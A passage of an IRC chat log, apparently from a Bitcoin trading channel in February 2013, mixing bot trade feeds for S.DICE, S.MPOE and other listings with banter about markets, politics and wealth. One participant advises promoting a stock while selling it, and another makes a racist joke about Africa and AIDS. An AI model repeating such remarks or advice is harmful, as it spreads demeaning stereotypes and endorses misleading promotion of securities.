percentage of M2? Feb 06 23:32:45 hahahaha asshat Feb 06 23:32:50 btw...if anyone is wondering i'm either mjrIII or therealjoshrossi on reddit Feb 06 23:32:52 [MPEX] [S.MPOE] 11600 @ 0.00069959 = 8.1152 BTC [+] Feb 06 23:32:54 [MPEX] [S.MPOE] 3550 @ 0.00069055 = 2.4515 BTC [-] Feb 06 23:33:03 mjr_ there's people to whom 30btc or 3mn bux are exactly the same : Feb 06 23:33:09 more dough than they'll ever see together. Feb 06 23:33:35 i suppose...and that is true...but if someone told you you could have a lamborghini for $600 i bet you would find a way Feb 06 23:33:49 i don't drive. Feb 06 23:33:53 [MPEX] [O.BTCUSD.C180T] 3 @ 0.17512989 = 0.5254 BTC [+] Feb 06 23:33:55 hehehe, me neither Feb 06 23:33:59 me neither Feb 06 23:34:01 nyc is the best for that reason Feb 06 23:34:13 i mean vs places you have to drice Feb 06 23:34:14 drive Feb 06 23:34:15 like la Feb 06 23:34:21 this town isn't too bad either. Feb 06 23:34:30 there aren't roads in your town Feb 06 23:34:49 i have no clue what town we are talking about Feb 06 23:34:53 just trodden paths Feb 06 23:35:42 Lyspooner http://farm5.staticflickr.com/4137/4885281777_7e7a3727a6_b.jpg" Feb 06 23:35:56 bullshit flicker with their spaceout.gif Feb 06 23:36:03 what do these fuckers thing they'll accomplish ? srsly now. Feb 06 23:36:11 there's a statue missing in your photo Feb 06 23:36:16 [MPEX] [S.MPOE] 4321 @ 0.00069994 = 3.0244 BTC [+] Feb 06 23:36:18 [MPEX] [S.MPOE] 1429 @ 0.00069998 = 1.0003 BTC [+] Feb 06 23:36:24 gypo musta gypped it. Feb 06 23:38:47 [MPEX] [S.MPOE] 3372 @ 0.00069087 = 2.3296 BTC [-] Feb 06 23:38:49 [MPEX] [S.MPOE] 1446 @ 0.00069056 = 0.9985 BTC [-] Feb 06 23:38:57 [MPEX] [S.MPOE] 7182 @ 0.00069055 = 4.9595 BTC [-] Feb 06 23:39:30 [MPEX] [S.DICE] 50000 @ 0.0065 = 325 BTC [+] Feb 06 23:40:51 [MPEX] [O.BTCUSD.C180T] 3 @ 0.17510134 = 0.5253 BTC [-] Feb 06 23:41:04 [MPEX] [S.MPOE] 4942 @ 0.00069055 = 3.4127 BTC [-] Feb 06 23:41:06 [MPEX] [S.MPOE] 4321 @ 0.00068657 = 2.9667 BTC [-] Feb 06 23:41:07 [MPEX] [S.MPOE] 4321 @ 0.00068657 = 2.9667 BTC [-] Feb 06 23:41:08 [MPEX] [S.MPOE] 4737 @ 0.00068656 = 3.2522 BTC [-] Feb 06 23:42:18 ;;calc -18/(.175-1) Feb 06 23:42:19 21.8181818182 Feb 06 23:42:29 ;;ticker Feb 06 23:42:31 BTCUSD ticker | Best bid: 21.12881, Best ask: 21.15000, Bid-ask spread: 0.02119, Last trade: 21.15000, 24 hour volume: 53390.41805179, 24 hour low: 20.50000, 24 hour high: 21.33390, 24 hour vwap: 21.04660 Feb 06 23:43:04 [MPEX] [S.MPOE] 4321 @ 0.00069983 = 3.024 BTC [+] Feb 06 23:43:06 [MPEX] [S.MPOE] 10366 @ 0.00069998 = 7.256 BTC [+] Feb 06 23:43:07 [MPEX] [S.MPOE] 9990 @ 0.00069998 = 6.9928 BTC [+] Feb 06 23:43:51 [MPEX] [S.DICE] 50000 @ 0.0065 = 325 BTC [+] Feb 06 23:44:27 [MPEX] [S.MPOE] 4321 @ 0.00069987 = 3.0241 BTC [-] Feb 06 23:44:28 [MPEX] [S.MPOE] 1629 @ 0.00069998 = 1.1403 BTC [+] Feb 06 23:45:13 [MPEX] [S.DICE] 50000 @ 0.0065 = 325 BTC [+] Feb 06 23:45:54 [MPEX] [S.DICE] 50000 @ 0.0065 = 325 BTC [+] Feb 06 23:46:57 o it started ? Feb 06 23:48:18 [MPEX] [O.BTCUSD.C180T] 2 @ 0.17510134 = 0.3502 BTC [-] Feb 06 23:50:40 [MPEX] [S.DICE] 1600 @ 0.00621011 = 9.9362 BTC [-] Feb 06 23:50:41 [MPEX] [S.DICE] 1500 @ 0.00623 = 9.345 BTC [+] Feb 06 23:50:43 [MPEX] [S.DICE] 900 @ 0.0062101 = 5.5891 BTC [-] Feb 06 23:50:44 [MPEX] [S.DICE] 1500 @ 0.00621 = 9.315 BTC [-] Feb 06 23:50:54 [MPEX] [S.DICE] 5917 @ 0.00620002 = 36.6855 BTC [-] Feb 06 23:50:56 [MPEX] [S.DICE] 3520 @ 0.00620001 = 21.824 BTC [-] Feb 06 23:50:57 [MPEX] [S.DICE] 17041 @ 0.0062 = 105.6542 BTC [-] Feb 06 23:50:59 funny to see soebot doing .35 btc sells along side of someone doing (what I assume to be) 325 btc buys Feb 06 23:51:06 [MPEX] [S.MPOE] 13069 @ 0.00068681 = 8.9759 BTC [-] Feb 06 23:52:55 lol Feb 06 23:54:15 [MPEX] [S.MPOE] 5706 @ 0.00068681 = 3.9189 BTC [-] Feb 06 23:55:07 [MPEX] [O.BTCUSD.P160T] 1 @ 0.03690265 BTC [+] Feb 06 23:55:55 [MPEX] [O.BTCUSD.C180T] 2 @ 0.17507573 = 0.3502 BTC [-] Feb 06 23:57:17 !ticker m s.dice Feb 06 23:57:19 [MPEX:S.DICE] 1D: 0.0055 / 0.00594765 / 0.00677999 (1495456 shares, 8,894.46 BTC), 7D: 0.0042 / 0.00575865 / 0.007395 (3152410 shares, 18,153.65 BTC), 30D: 0.00085848 / 0.00524449 / 0.0075 (8266098 shares, 43,351.51 BTC) Feb 06 23:57:46 [MPEX] [S.MPOE] 1100 @ 0.00069997 = 0.77 BTC [+] Feb 07 00:00:27 Last hour before I remove the ask on S.DICE-PT Feb 07 00:02:38 EskimoBob, you know that if you are selling you should be PROMOTING the stock until you exit your position, right? Feb 07 00:03:05 Erhm, how would that help you sell them? Feb 07 00:03:22 [MPEX] [S.MPOE] 3450 @ 0.00069386 = 2.3938 BTC [-] Feb 07 00:03:24 [MPEX] [S.MPOE] 4321 @ 0.00068703 = 2.9687 BTC [-] Feb 07 00:03:25 [MPEX] [S.MPOE] 929 @ 0.00068681 = 0.638 BTC [-] Feb 07 00:03:27 [HAVELOCK] [SDICE] 4 @ 0.66 = 2.64 BTC [-] Feb 07 00:03:27 Unless you just bought some at 0.0062? Feb 07 00:03:46 My pass-through is brand new. Feb 07 00:04:37 [MPEX] [S.DICE] 789 @ 0.00611994 = 4.8286 BTC [-] Feb 07 00:04:56 [MPEX] [S.MPOE] 3221 @ 0.00069997 = 2.2546 BTC [+] Feb 07 00:04:57 [MPEX] [S.MPOE] 2508 @ 0.00069998 = 1.7555 BTC [+] Feb 07 00:04:59 [MPEX] [S.MPOE] 771 @ 0.00069998 = 0.5397 BTC [+] Feb 07 00:05:06 eskimobob has a position now ?! in what ? Feb 07 00:05:17 a sex position of course :-) Feb 07 00:05:29 in what... um. Feb 07 00:05:38 in da butt ? Feb 07 00:06:02 there are only, really, 2 good choices, imo Feb 07 00:07:13 good evening Feb 07 00:08:33 heh, yeah, too much hardcore minecraft Feb 07 00:08:48 (lol, i even expected it to tab-complete minecraft) Feb 07 00:10:21 [MPEX] [O.BTCUSD.C180T] 2 @ 0.16938766 = 0.3388 BTC [-] Feb 07 00:13:25 [HAVELOCK] [SDICE] 10 @ 0.679 = 6.79 BTC [+] Feb 07 00:14:05 [MPEX] [S.MPOE] 4321 @ 0.00068707 = 2.9688 BTC [-] Feb 07 00:14:07 [MPEX] [S.MPOE] 12779 @ 0.00068681 = 8.7767 BTC [-] Feb 07 00:16:57 [MPEX] [O.BTCUSD.C180T] 1 @ 0.17544034 BTC [+] Feb 07 00:17:25 [MPEX] [S.MPOE] 4321 @ 0.00069982 = 3.0239 BTC [+] Feb 07 00:17:26 [MPEX] [S.MPOE] 1440 @ 0.00069998 = 1.008 BTC [+] Feb 07 00:17:28 [MPEX] [S.MPOE] 7152 @ 0.00069998 = 5.0063 BTC [+] Feb 07 00:17:29 [MPEX] [S.MPOE] 794 @ 0.00069999 = 0.5558 BTC [+] Feb 07 00:19:07 EskimoBob: it's on BTCT.co, name S.DICE-PT Feb 07 00:21:38 [MPEX] [S.MPOE] 4321 @ 0.00069965 = 3.0232 BTC [-] Feb 07 00:21:40 [MPEX] [S.MPOE] 1779 @ 0.00069998 = 1.2453 BTC [+] Feb 07 00:22:24 [HAVELOCK] [SDICE] 10 @ 0.67 = 6.7 BTC [-] Feb 07 00:24:12 [MPEX] [O.BTCUSD.C180T] 1 @ 0.17541191 BTC [-] Feb 07 00:29:01 "Yeah, do that...convince multimillion dollar companies to trust you with their shares, make a secure system, garner a large enough user base to provide liquidity. Sounds like that would be a lot easier than paying 30 BTC" Feb 07 00:29:02 makomk malaimo markedathome maximian midnightmagic mircea_popescu mjr_ mod6 molecular Feb 07 00:29:05 lol mjr_ Feb 07 00:29:31 hehehe Feb 07 00:29:34 glad you approve Feb 07 00:29:49 but this is bitcoin! Feb 07 00:29:56 maff! Feb 07 00:30:03 extortion Feb 07 00:30:10 i am allowing you tochoose my product or not Feb 07 00:30:14 stop extorting me bro Feb 07 00:30:39 seriously, 3 to 4 mill to get on NYSE Feb 07 00:30:53 and i don't think they had pretty UI on those terminals Feb 07 00:31:10 and if anyone has ever tried to use FIX...mpex is a LOT easier Feb 07 00:31:17 [MPEX] [O.BTCUSD.C180T] 1 @ 0.175386 BTC [-] Feb 07 00:31:23 "lol, what alternatives are there" "Colored coin, once its working correctly." Feb 07 00:31:26 why ? because i'm shady Feb 07 00:31:35 this has got to be like... liberal logic or something. Feb 07 00:33:09 [MPEX] [S.MPOE] 4321 @ 0.00069274 = 2.9933 BTC [-] Feb 07 00:33:10 [MPEX] [S.MPOE] 6300 @ 0.0006924 = 4.3621 BTC [-] Feb 07 00:33:12 [MPEX] [S.MPOE] 5000 @ 0.00068682 = 3.4341 BTC [-] Feb 07 00:33:15 [MPEX] [S.MPOE] 586 @ 0.00068681 = 0.4025 BTC [-] Feb 07 00:33:16 [MPEX] [S.MPOE] 1653 @ 0.00068681 = 1.1353 BTC [-] Feb 07 00:33:25 oh, sorry we sent that reject, you set your tag 55 to mpex Feb 07 00:33:39 i am liberal Feb 07 00:33:42 but i am not stupid Feb 07 00:33:50 i think there are dumb people all around Feb 07 00:33:59 political leanings aside Feb 07 00:34:51 this is why i like bitcoins though, if you are liberal you can appreciate empowering people...if you are conservative you can appreciate good fiscal policy Feb 07 00:35:10 bill and melinda gates foundation's new push is to move towards a cashless society Feb 07 00:35:18 because it will help to stop poverty Feb 07 00:35:35 they have different ideas about it than bitcoin, but this is an idea whose time has come Feb 07 00:35:59 we always new billy boy was teh antichrist Feb 07 00:36:07 now, proof! Feb 07 00:36:46 mjr_ mayhap you have a point Feb 07 00:37:18 "stop poverty" such idiocy Feb 07 00:37:25 well Feb 07 00:37:27 complete fail Feb 07 00:37:36 i think they specifically mean, stop governments from stealing from their people Feb 07 00:37:39 poverty is great : without poor people there's absolutely no way to explain to idiot kids frittering their time on reddit why this is a bad idea. Feb 07 00:37:42 and make sure the aid gets where we meant it to go Feb 07 00:37:53 you mean the aids ? Feb 07 00:37:57 sorry, couldn Feb 07 00:37:58 lol Feb 07 00:38:01 t pass on that :D Feb 07 00:38:01 yes, that is what i was thinking Feb 07 00:38:02 hehehe Feb 07 00:38:07 the aid goes to aids Feb 07 00:38:17 but seriously, corrupt governments rely on their control of the currency Feb 07 00:38:25 [BTCTC] [GSDPT] 170 @ 0.0062 = 1.054 BTC [+] Feb 07 00:38:28 cashless society just empowers that control. Feb 07 00:38:34 take that away and the people have a much stronger footing Feb 07 00:38:36 and when in the history of man has this been elimintated Feb 07 00:38:39 not really Feb 07 00:38:41 never Feb 07 00:38:49 history is correct Feb 07 00:38:49 but we have never had a currency like bitcoin Feb 07 00:38:54 people have it so backwards, when we give aid to africa we are simply repaying some of the AIDS they gave us Feb 07 00:38:56 history is correct Feb 07 00:39:01 yes, i have never seen a black swan so therefore i never will see one Feb 07 00:39:35 every record setting earthquake could not have been predicted using the past Feb 07 00:39:44 since they are by definition the largest earthquake on record Feb 07 00:39:52 [MPEX] [S.MPOE] 5200 @ 0.00069258 = 3.6014 BTC [+] Feb 07 00:40:23 my point being that although we can learn from history, to think that it contains all we need to know is obviously false Feb 07 00:40:41 mjr_ it doesn't contain it in fact. it contains it in essence. Feb 07 00:40:46 has there ever been an empire that avoided collapse in response to its treatment of its citizens? Feb 07 00:40:47 mircea_popescu: you ain't seen me troll boa Feb 07 00:40:47 History repeats itself, always Feb 07 00:40:50 well looks like the S.DICE action settled down Feb 07 00:40:51 it does Feb 07 00:40:57 the mobile vulgus of today, herpderping on reddit, is the exact same mobile vulgus of 20 ad Feb 07 00:40:59 nothing changed. Feb 07 00:41:00 so that is why we got those computers the cavemen invented AGAIN Feb 07 00:41:12 450k sold and another 700k flashed Feb 07 00:41:14 [MPEX] [S.MPOE] 4321 @ 0.00069362 = 2.9971 BTC [+] Feb 07 00:41:16 [MPEX] [S.MPOE] 4008 @ 0.00069347 = 2.7794 BTC [-] Feb 07 00:41:27 lol, yes some caveman was talking shit a long time ago... Feb 07 00:41:29 to say that computers were expected based on history...or that they didn't change the world...is just not possible Feb 07 00:41:46 so no, not everything is cyclical Feb 07 00:41:46 you don't understand. not invention, history Feb 07 00:41:51 yes i get it Feb 07 00:42:13 and i am saying if you think that you have seen everything that life can possibly throw at you...expect to be surprised Feb 07 00:42:26 people will be people Feb 07 00:42:46 but if you are a rational person...people respond to incentive and disincentive... Feb 07 00:42:50 No, I am not suprised- I expect people to do shitty things Feb 07 00:42:58 and those will forever change in ways we can't predict Feb 07 00:43:08 Not in my opinion Feb 07 00:43:14 ok... Feb 07 00:43:20 you are welcome to your opinion Feb 07 00:43:24 [MPEX] [S.MPOE] 4321 @ 0.00069976 = 3.0237 BTC [+] Feb 07 00:43:26 [MPEX] [S.MPOE] 11929 @ 0.00069998 = 8.3501 BTC [+] Feb 07 00:43:27 [MPEX] [S.MPOE] 2450 @ 0.00069998 = 1.715 BTC [+] Feb 07 00:43:40 People killed,scammed and did the same shitty things 1000 years ago..they will do so again Feb 07 00:43:49 but i think that yes, people will always be people, there will be shitty people, stupid people, evil people, good people, smart people Feb 07 00:43:55 i agree Feb 07 00:44:04 they also did nice things then and now Feb 07 00:44:10 we agree on that Feb 07 00:44:15 I do not dispute that Feb 07 00:44:26 but does the life they live, what they do and how they do it not change? Feb 07 00:44:45 for example HOW we treat others like shit Feb 07 00:45:06 it used to take years for a caveman to be able to troll another guy on the other side of the country Feb 07 00:45:09 [MPEX] [S.MPOE] 5692 @ 0.00069347 = 3.9472 BTC [-] Feb 07 00:45:10 now we cn do it in seconds Feb 07 00:45:11 people do not change, I have tried for 20 years seeing it. A reformed meth head, will be a meth head again -almost all the time Feb 07 00:45:15 lol good one Feb 07 00:45:29 you proved my point Feb 07 00:45:34 "almost all the time" Feb 07 00:45:36 jborkl i have seen people change first hand. it involves chains and whips tho. Feb 07 00:45:43 Force Feb 07 00:45:47 =power Feb 07 00:45:51 I agree Feb 07 00:45:54 well...true Feb 07 00:45:57 but the way i see it Feb 07 00:46:02 is that at the end of the day Feb 07 00:46:08 the one with the force is the one with the most peolpe Feb 07 00:46:13 not exactly force in that sense, no. Feb 07 00:46:21 I understand Feb 07 00:46:24 cuz of armies? police? Feb 07 00:46:34 they have to be paid... Feb 07 00:46:41 nah. peopl;e are practically made out of two halves. there's a beast within Feb 07 00:46:44 bad finances equals no army, no police Feb 07 00:46:48 i agree Feb 07 00:46:59 but you can still treat people decently...everyone here has been very nice Feb 07 00:47:05 even if the person agrees with you, the subconsciouis needs to be straightened too Feb 07 00:47:42 I contain multitudes. Feb 07 00:47:43 [MPEX] [S.MPOE] 6841 @ 0.0006912 = 4.7285 BTC [-] Feb 07 00:47:49 it is like baseball Feb 07 00:47:58 most teams will lose 60 games and win 60 games Feb 07 00:48:00 No, people are always going to be violent. It is the way of the world. Ask Sierra Leone Feb 07 00:48:09 its what happens in those other 42 games that really matter Feb 07 00:48:42 so yes, on the whole, people are bad and good, but in that zone in between, there is room for growth and change, and that can inspire or disappoint Feb 07 00:49:08 and sure people will be violent... Feb 07 00:49:12 but i have one question Feb 07 00:49:12 I am not going to argue right and wrong. That is a fallacy, because it is the perception of right and wrong to the individual Feb 07 00:49:30 how many people got shot because of gun violence on silk road? Feb 07 00:49:44 lol Feb 07 00:49:54 no "deals going bad" Feb 07 00:49:58 we can become safer Feb 07 00:50:04 and minimize the abiltiy of others to harm us Feb 07 00:50:23 You are not looking at how they got the money for drugs, most drug dealers don't get shot peddling drugs and I don't really care if they do Feb 07 00:50:24 the point is not to say the system is good or bad, the point is to say that i can thrive in the system as it is Feb 07 00:51:20 I can't even remember what we are talking about Feb 07 00:51:26 lol yeah me too Feb 07 00:51:30 but i enjoyed the convo Feb 07 00:51:43 yeah, me too Feb 07 00:51:58 i think we in general agree tbh Feb 07 00:52:05 we just focus on different parts Feb 07 00:52:09 drug dealers are people too bro Feb 07 00:52:22 i agree there will always be poverty, shitty people, crime, violence Feb 07 00:52:36 but i think there will also be innovation, beauty, happiness Feb 07 00:52:43 I do not pass judgment on what people do, they understand risk involved. So I do not feel compassion Feb 07 00:52:45 so i focus on maximizing one, and minimizing the other Feb 07 00:53:47 i wish i had bought that straddle from bugpowder Feb 07 00:54:02 I figure it is their problem if they can't handle their business Feb 07 00:54:14 i think it is gonna just bumble around 21 for a week Feb 07 00:54:25 probably longer Feb 07 00:56:49 no pok Feb 07 00:58:07 http://www.youtube.com/watch?v=0ieDXIhci7o Feb 07 00:58:25 ? Feb 07 00:58:57 no pok i tell you Feb 07 00:59:41 [MPEX] [S.MPOE] 5000 @ 0.00068684 = 3.4342 BTC [-] Feb 07 00:59:42 [MPEX] [S.MPOE] 1950 @ 0.00068683 = 1.3393 BTC [-] Feb 07 01:02:13 ok Feb 07 01:02:25 thay was an rather stupid bt funny vid Feb 07 01:02:26 ;D Feb 07 01:02:31 [BTCTC] [GSDPT] 1086 @ 0.0062 = 6.7332 BTC [+] Feb 07 01:04:09 [MPEX] [S.MPOE] 4321 @ 0.00069694 = 3.0115 BTC [+] Feb 07 01:04:11 [MPEX] [S.MPOE] 1299 @ 0.00069727 = 0.9058 BTC [+] Feb 07 01:06:51 [MPEX] [S.MPOE] 2371 @ 0.00068683 = 1.6285 BTC [-] Feb 07 01:06:53 [MPEX] [S.MPOE] 4647 @ 0.00068682 = 3.1917 BTC [-] Feb 07 01:11:27 no pok? Feb 07 01:12:15 look at those havelock bids Feb 07 01:15:59 so did evoorhees say when? same time? Feb 07 01:17:41 i see 58,000 shares asking .0062 on bitfunder... Feb 07 01:17:54 is dropping another million? Feb 07 01:20:11 I will do the next tranche at roughly the same time tomorrow (Wed. evening 10pm EST). Price will be .0062 per share this time. Feb 07 01:20:26 [MPEX] [S.MPOE] 353 @ 0.00068682 = 0.2424 BTC [-] Feb 07 01:20:26 presumably on MPEx Feb 07 01:20:27 [MPEX] [S.MPOE] 3347 @ 0.00068681 = 2.2988 BTC [-] Feb 07 01:20:28 [MPEX] [S.MPOE] 213 @ 0.00068656 = 0.1462 BTC [-] Feb 07 01:20:39 [MPEX] [S.MPOE] 4321 @ 0.00068621 = 2.9651 BTC [-] Feb 07 01:20:40 [MPEX] [S.MPOE] 10000 @ 0.0006862 = 6.862 BTC [-] Feb 07 01:20:41 [MPEX] [S.MPOE] 5266 @ 0.00068619 = 3.6135 BTC [-] Feb 07 01:20:45 i dunno exactly why i didnt push all the coins in at 44 Feb 07 01:21:04 perhaps i got a stroke and half of my brain is dead. Feb 07 01:21:39 I wish I had been awake Feb 07 01:21:44 o i was. Feb 07 01:21:45 I would have bought half the stack Feb 07 01:22:09 He'll drop 3 million shares more Feb 07 01:22:21 I wonder if that will actually drop down the price post ipo Feb 07 01:22:29 since the supply have increased.. Feb 07 01:22:34 nope Feb 07 01:22:35 it wont Feb 07 01:22:39 r u silly Feb 07 01:22:45 it may set a ceiling for a while Feb 07 01:22:48 maybe Feb 07 01:23:00 the 7xx was fueled by its scarcity partly Feb 07 01:23:04 only thing that will drop the price is falling bet volumes Feb 07 01:23:12 7xx was fueled by fundamental Feb 07 01:23:17 2.8% dividend Feb 07 01:23:37 .8xx on havelock was scarcity Feb 07 01:23:57 price is down right now only cause people know drop is coming at .0062 Feb 07 01:23:59 mhm, the volumes going up so far steadily, our little whale seems to have taken a break Feb 07 01:24:08 but dice is up 6k Feb 07 01:24:14 Well, I think the whale lost all his coins Feb 07 01:24:17 seriosly Feb 07 01:24:24 thats not good Feb 07 01:24:32 whale == bot Feb 07 01:24:33 :P Feb 07 01:24:48 well, the whale was the one who jacked up the dice's price Feb 07 01:24:57 Watch some new addresses spring up after the tranches selling out ;-) Feb 07 01:25:01 lol Feb 07 01:25:07 we need more whales and his buddies Feb 07 01:25:17 someone advertise on rich kids of instagram Feb 07 01:25:21 LOL Feb 07 01:26:04 they seem to have no problems opening a bottle of dom to wash something, may as well play dice to get moar monies Feb 07 01:27:39 soon enough we can all take a pic of our wallets and post it on rkoi lol Feb 07 01:28:24 [HAVELOCK] [SDICE] 2 @ 0.67 = 1.34 BTC [-] Feb 07 01:29:43 [MPEX] [S.MPOE] 5200 @ 0.00069249 = 3.6009 BTC [+] Feb 07 01:30:17 although no spikes from whales, total bets still increasing steadily? Feb 07 01:30:21 like rkoi would understand such nerdiness Feb 07 01:30:33 i would prefer steady sustainable growth Feb 07 01:30:43 steady dividends Feb 07 01:30:55 well, i dont think s.dice is sustainable with btc price rocketing at this rate Feb 07 01:31:01 well... Feb 07 01:31:03 i suppose Feb 07 01:31:07 i mean, lets say btc shooots up to the moooon Feb 07 01:31:10 they can make smaller bets Feb 07 01:31:17 but that is still just as good Feb 07 01:31:19 [MPEX] [S.MPOE] 400 @ 0.00069249 = 0.277 BTC [+] Feb 07 01:31:24 since the stock is denominated in btc Feb 07 01:31:44 oh sorry, i keep thinking about how i will show the total portfolio gains in USD Feb 07 01:31:46 yeah but i doubt the volume will go that high if btc goes to 500 Feb 07 01:31:49 which will be killer regardless Feb 07 01:32:00 i don't think i will worry too much if btc goes that high Feb 07 01:32:03 but the fact remains Feb 07 01:32:17 Bugpowder was throwing some nice curves around Feb 07 01:32:18 small bet worth big dollars = big bet worth small dollars Feb 07 01:32:29 not that i want dollars Feb 07 01:32:37 even mpoe-pr asked permission to use them Feb 07 01:32:37 i am going as long as possible bitcoins Feb 07 01:32:52 where can i see those? Feb 07 01:32:59 are you talking graphs? Feb 07 01:33:02 yea Feb 07 01:33:06 [MPEX] [S.MPOE] 4321 @ 0.0006863 = 2.9655 BTC [-] Feb 07 01:33:08 [MPEX] [S.MPOE] 6729 @ 0.0006862 = 4.6174 BTC [-] Feb 07 01:33:09 they posted anywhere? Feb 07 01:33:14 yea Feb 07 01:33:51 i'm still blown away by girlsgonebitcoin Feb 07 01:33:55 that was really fast Feb 07 01:33:56 but don't remember where Feb 07 01:33:57 hahaha Feb 07 01:34:03 what happened? Feb 07 01:34:10 NSFW Feb 07 01:34:22 that site springing up and girls knowing about and wanting bitcoins Feb 07 01:34:35 think that was a lot rarer a year ago Feb 07 01:34:48 if girls can want bitcoin, then rkoi can undertstand them Feb 07 01:34:48 very tech centric (which usually means male centric) user base Feb 07 01:34:56 oooh old news. i was hoping for some juicy details Feb 07 01:35:42 [MPEX] [S.MPOE] 2265 @ 0.0006862 = 1.5542 BTC [-] Feb 07 01:35:44 [MPEX] [S.MPOE] 14879 @ 0.00068619 = 10.2098 BTC [-] Feb 07 01:35:46 yeah sorry to disappoint Feb 07 01:35:48 question Feb 07 01:36:09 tell me someone else collects rich kids instagram...and they don't knowingly put it themselves on a site called rich kids of instagram Feb 07 01:37:40 no they knowingly put themselves in there Feb 07 01:37:55 you can also advertise on rich kids of instagram for 500 dollars per 2 days Feb 07 01:39:32 found at rkoi: http://25.media.tumblr.com/e45e90612ca90f7bd579402427745dff/tumblr_mggzznJlmZ1rb86ldo1_400.jpg Feb 07 01:39:44 we're not fo far from that, really Feb 07 01:39:56 yeah i seen that. that dude lost a bunch of monies Feb 07 01:40:13 in fact, i get bigger commissions that that Feb 07 01:45:47 you should Feb 07 01:45:48 that is tiny Feb 07 01:46:03 http://richkidsofinstagram.tumblr.com/post/38024884212/3k-truffle Feb 07 01:46:06 i didn't wnt to do the math Feb 07 01:46:12 was that whne it hit 700? Feb 07 01:46:19 The said part is the waiter touched the plate with his fingers causing some prints Feb 07 01:46:29 that made me sad Feb 07 01:46:30 :/ Feb 07 01:46:53 yes...but isn't that why we are all here Feb 07 01:47:07 so that our kids can have the opportunity to be on RKOI that we may have not gotten? Feb 07 01:47:16 dude i am the kid Feb 07 01:47:17 lol Feb 07 01:48:12 i just hope btc dont shoot up to the moon while i still have dice shares Feb 07 01:48:22 why not? Feb 07 01:48:35 you want to know whats funny? Feb 07 01:48:39 on seals with clubs Feb 07 01:48:40 i fear the dice will be left behind Feb 07 01:48:49 they don't know how much btc costs Feb 07 01:48:52 lol Feb 07 01:49:08 think they get freerolls (a bunch of them do anyway) Feb 07 01:49:21 some would not know how to buy Feb 07 01:49:51 1 btc = 200 dollars 1.5 years from now. Feb 07 01:50:10 people wont bet the same stake with btc Feb 07 01:50:20 the prob, is we already paid 0.xx62 with dice Feb 07 01:50:36 we may get return dollar wise, but not btc wise Feb 07 01:50:49 it all depends if dice can keep up with btc Feb 07 01:51:10 well Feb 07 01:51:17 that is true and i hadn't thought about that Feb 07 01:51:28 in 1.5 years you may as well get back the full s.dice investment Feb 07 01:51:39 in divs Feb 07 01:51:48 im not sure if 20k a month is sustainable Feb 07 01:51:59 http://www.cnbc.com/id/100439059 Feb 07 01:52:09 the prob is 21 million btc, dice is already worth 600k Feb 07 01:52:10 guess RKOI didn't have this guy as a dad Feb 07 01:52:16 a single poker table makes 20k a month Feb 07 01:52:37 i personally think it is going to balance out Feb 07 01:52:40 20k btc Feb 07 01:52:47 [MPEX] [S.MPOE] 4321 @ 0.00068657 = 2.9667 BTC [+] Feb 07 01:52:49 [MPEX] [S.MPOE] 16500 @ 0.00068667 = 11.3301 BTC [+] Feb 07 01:52:51 [MPEX] [S.MPOE] 1622 @ 0.00069016 = 1.1194 BTC [+] Feb 07 01:53:06 and im not sure if the general public would be interested in playing dice.. everyone i know is broke Feb 07 01:53:08 cept me Feb 07 01:53:13 well.. Feb 07 01:53:18 scratchoffs Feb 07 01:53:21 bitcoin equivalent Feb 07 01:53:22 LOL Feb 07 01:53:28 anyways, gotta run guys Feb 07 01:53:34 see you later tonight Feb 07 01:55:29 I call bunk Feb 07 01:56:27 those are poor kids with rich frinds posting that shit Feb 07 01:56:33 why would you bother if you were actually rich Feb 07 01:58:12 i would say it's cheaper than taking out an ad in "i'm a douche magazine" but oh yeah, their rich, they dont' have to worry about that Feb 07 02:02:30 how does this get here http://richkidsofinstagram.tumblr.com/post/40053795655/buckle-up-the-champers nasty ass veuve Feb 07 02:08:50 [MPEX] [S.MPOE] 4321 @ 0.00068621 = 2.9651 BTC [-] Feb 07 02:08:51 [MPEX] [S.MPOE] 11429 @ 0.0006862 = 7.8426 BTC [-] Feb 07 02:19:31 [MPEX] [S.MPOE] 2791 @ 0.00068684 = 1.917 BTC [+] Feb 07 02:19:33 [MPEX] [S.MPOE] 531 @ 0.0006862 = 0.3644 BTC [-] Feb 07 02:20:18 [BTCTC] [S.MPOE-PT] 60 @ 0.0007 = 0.042 BTC Feb 07 02:20:27 [MPEX] [S.MPOE] 4321 @ 0.00068999 = 2.9814 BTC [+] Feb 07 02:20:29 [MPEX] [S.MPOE] 10377 @ 0.00069016 = 7.1618 BTC [+] Feb 07 02:20:31 [MPEX] [S.MPOE] 12450 @ 0.00069444 = 8.6458 BTC [+] Feb 07 02:20:32 [MPEX] [S.MPOE] 11851 @ 0.00069727 = 8.2633 BTC [+] Feb 07 02:20:34 [MPEX] [S.MPOE] 15400 @ 0.00069833 = 10.7543 BTC [+] Feb 07 02:20:34 [MPEX] [S.MPOE] 23450 @ 0.00069891 = 16.3894 BTC [+] Feb 07 02:20:36 [MPEX] [S.MPOE] 3136 @ 0.00069998 = 2.1951 BTC [+] Feb 07 02:20:38 [MPEX] [S.MPOE] 6841 @ 0.00069998 = 4.7886 BTC [+] Feb 07 02:20:39 [MPEX] [S.MPOE] 9647 @ 0.00069998 = 6.7527 BTC [+] Feb 07 02:20:41 [MPEX] [S.MPOE] 10353 @ 0.00069998 = 7.2469 BTC [+] Feb 07 02:20:42 [MPEX] [S.MPOE] 8994 @ 0.00069998 = 6.2956 BTC [+] Feb 07 02:20:44 [MPEX] [S.MPOE] 86779 @ 0.00069999 = 60.7444 BTC [+] Feb 07 02:20:45 [MPEX] [S.MPOE] 796401 @ 0.0007 = 557.4807 BTC [+] Feb 07 02:20:55 [BTCTC] [S.MPOE-PT] 10 @ 0.0007 = 0.007 BTC Feb 07 02:21:32 uhm Feb 07 02:21:52 someone is arbing S.MPOE-PT? Feb 07 02:23:04 [BTCTC] [BASIC-MINING] 1 @ 0.3497 BTC [+] Feb 07 02:24:45 [BTCTC] [COGNITIVE] 3 @ 0.338 = 1.014 BTC [+] Feb 07 02:26:06 [BTCTC] [GSDPT] 20 @ 0.0062 = 0.124 BTC [+] Feb 07 02:26:42 [BTCTC] [BASIC-MINING] 9 @ 0.3497 = 3.1473 BTC [+] Feb 07 02:29:11 [BTCTC] [COGNITIVE] 1 @ 0.339 BTC [+] Feb 07 02:31:27 [BTCTC] [BTC-BOND] 10 @ 0.0098 = 0.098 BTC [+] Feb 07 02:32:24 !ticker m s.mpoe Feb 07 02:32:24 [BTCTC] [PAJKA.BOND] 1 @ 0.0699 BTC Feb 07 02:32:26 [MPEX:S.MPOE] 1D: 0.00066705 / 0.0006913 / 0.0007 (3786811 shares, 